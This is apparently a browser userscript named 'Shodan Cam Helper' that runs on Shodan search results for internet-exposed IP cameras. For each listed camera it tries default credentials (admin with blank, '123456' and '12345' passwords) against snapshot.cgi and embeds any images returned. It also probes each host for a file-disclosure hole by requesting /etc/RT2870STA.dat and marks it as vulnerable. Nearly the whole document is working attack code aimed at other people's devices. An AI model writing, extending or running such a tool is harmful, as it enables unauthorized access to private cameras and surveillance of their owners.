Helper

1. // ==UserScript==
2. // @name         Shodan Cam Helper
3. // @namespace    http://ebaumsworld.com/
4. // @version      0.1
5. // @description  Adds snapshots for your IP cameras
6. // @author       joe
7. // @match        https://www.shodan.io/search?query*
8. // @grant        GM_xmlhttpRequest
9. // ==/UserScript==
10.  
11. var ENABLED_LOGGABLE_VIDEOSTREAM = false;
12. var ENABLED_SNAPSHOT = true;
13. var ENABLED_TRAVERSAL = true;
14. var IPs = [];
15. var TIMEOUT_IN_MS = 2000;
16.  
17. addCredentials = function(type, username, password, url)
18. {
19.     if(type == 1)
20.     { // add at http
21.         return url.replace("http://", "http://" + username + ":" + password + "@");
22.     }
23.     else
24.     {
25.         if(url.indexOf("?") > 0)
26.         {
27.             url += "&";
28.         }
29.         else
30.         {
31.             url += "?";
32.         }
33.         return url + "user=" + username + "&pwd=" + password;
34.     }
35. }
36.  
37.  
38. var shodanIPs = document.getElementsByClassName("ip");
39. var i = 0;
40. for(i = 0; i < shodanIPs.length; i++)
41. {
42.     var url = shodanIPs[i].getElementsByTagName("a")[0].href;
43.     var videostream =  addCredentials(1, "admin", "", url + "videostream.cgi");
44.     var snapshot = addCredentials(2, "admin", "", url + "snapshot.cgi");
45.     var snapshot2 = addCredentials(2, "admin", "123456", url + "snapshot.cgi");
46.     var snapshot3 = addCredentials(2, "admin", "12345", url + "snapshot.cgi");
47.     //var traversalCheck = url + "//etc/RT2870STA.dat";
48.    
49.     var addition = "<br />";
50.    
51.     if(ENABLED_LOGGABLE_VIDEOSTREAM)
52.     {
53.         addition += "Loggable: <img src=\"" + videostream + "\" /><br />";
54.     }
55.     if(ENABLED_SNAPSHOT)
56.     {
57.         addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot + "\" /><br />";
58.         addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot2 + "\" /><br />";
59.         addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot3 + "\" /><br />";
60.     }
61.     if(ENABLED_TRAVERSAL)
62.     {
63.         addition += "<div class=\"" + url + "\"> </div>";
64.         IPs.unshift(url);
65.     }
66.    
67.     shodanIPs[i].innerHTML += addition;
68. }
69.  
70. function checkVulnerability()
71. {
72.     if(IPs.length > 0)
73.     {
74.         var currentIP = IPs.pop();
75.         GM_xmlhttpRequest({
76.             url: currentIP + "/etc/RT2870STA.dat",
77.             method: "GET",
78.             onload: function(response) {
79.                 var text = "";
80.                 if(response.status == "200")
81.                 {
82.                     text = "<b><u>Vulnerable to //proc/kcore!</u></b>";
83.                 }
84.                 else
85.                 {
86.                     text = "Not vulnerable?";
87.                 }
88.                 document.getElementsByClassName(currentIP)[0].innerHTML = text;
89.                 checkVulnerability();
90.             },
91.             timeout: TIMEOUT_IN_MS,
92.             ontimeout: function() {
93.                 var text = "Request timed out (Is site up?)";
94.                 document.getElementsByClassName(currentIP)[0].innerHTML = text;
95.                 checkVulnerability();  
96.             }
97.         });
98.     }
99. }
100.  
101. checkVulnerability();